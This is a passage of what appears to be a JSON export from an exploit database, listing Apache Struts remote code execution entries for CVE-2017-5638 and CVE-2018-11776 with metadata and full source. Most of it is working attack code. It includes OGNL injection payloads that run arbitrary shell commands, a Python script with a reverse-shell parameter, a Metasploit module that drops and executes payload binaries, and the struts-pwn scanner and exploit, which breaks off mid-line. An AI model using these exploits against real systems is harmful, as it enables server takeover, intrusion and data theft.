\n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}], "zdt": [{"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and in same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesnat have value\r\nand action set and in same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl_payload += \"(@[email\u00a0protected](#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@[email\u00a0protected]('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and non include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@[email\u00a0protected]().getOutputStream())).|\r\n ognl << %q|(@[email\u00a0protected](#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email\u00a0protected]@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email\u00a0protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, 